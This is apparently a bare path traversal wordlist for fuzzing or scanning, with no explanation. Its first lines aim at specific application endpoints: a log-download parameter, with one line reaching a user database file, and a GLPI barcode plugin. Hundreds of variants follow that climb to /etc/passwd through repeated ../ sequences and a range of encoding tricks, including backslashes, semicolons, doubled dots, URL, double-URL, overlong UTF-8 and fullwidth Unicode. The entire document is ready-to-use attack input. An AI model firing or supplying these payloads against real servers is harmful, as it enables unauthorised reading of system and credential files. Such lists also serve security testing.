/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
\etc/passwd
..\etc/passwd
..\..\etc/passwd
..\..\..\etc/passwd
..\..\..\..\etc/passwd
..\..\..\..\..\etc/passwd
..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\..\etc/passwd
..\..\..\..\..\..\..\..\..\..\..\etc/passwd
..\/etc/passwd
..\/..\/etc/passwd
..\/..\/..\/etc/passwd
..\/..\/..\/..\/etc/passwd
..\/..\/..\/..\/..\/etc/passwd
..\/..\/..\/..\/..\/..\/etc/passwd
..\/..\/..\/..\/..\/..\/..\/etc/passwd
..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....\/etc/passwd
....\/....\/etc/passwd
....\/....\/....\/etc/passwd
....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
..;/etc/passwd
..;/..;/etc/passwd
..;/..;/..;/etc/passwd
..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd
..././etc/passwd
..././..././etc/passwd
..././..././..././etc/passwd
..././..././..././..././etc/passwd
..././..././..././..././..././etc/passwd
..././..././..././..././..././..././etc/passwd
..././..././..././..././..././..././..././etc/passwd
..././..././..././..././..././..././..././..././etc/passwd
..././..././..././..././..././..././..././..././..././etc/passwd
..././..././..././..././..././..././..././..././..././..././etc/passwd
..././..././..././..././..././..././..././..././..././..././..././etc/passwd
...\.\etc/passwd
...\.\...\.\etc/passwd
...\.\...\.\...\.\etc/passwd
...\.\...\.\...\.\...\.\etc/passwd
...\.\...\.\...\.\...\.\...\.\etc/passwd
...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd
...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd
...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd
...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd
...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd
...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\etc/passwd
%5c../etc/passwd
%5c..%5c../etc/passwd
%5c..%5c..%5c../etc/passwd
%5c..%5c..%5c..%5c../etc/passwd
%5c..%5c..%5c..%5c..%5c../etc/passwd
%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd
%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../etc/passwd
/%5C../etc/passwd
/%5C../%5C../etc/passwd
/%5C../%5C../%5C../etc/passwd
/%5C../%5C../%5C../%5C../etc/passwd
/%5C../%5C../%5C../%5C../%5C../etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd
%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd
%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd
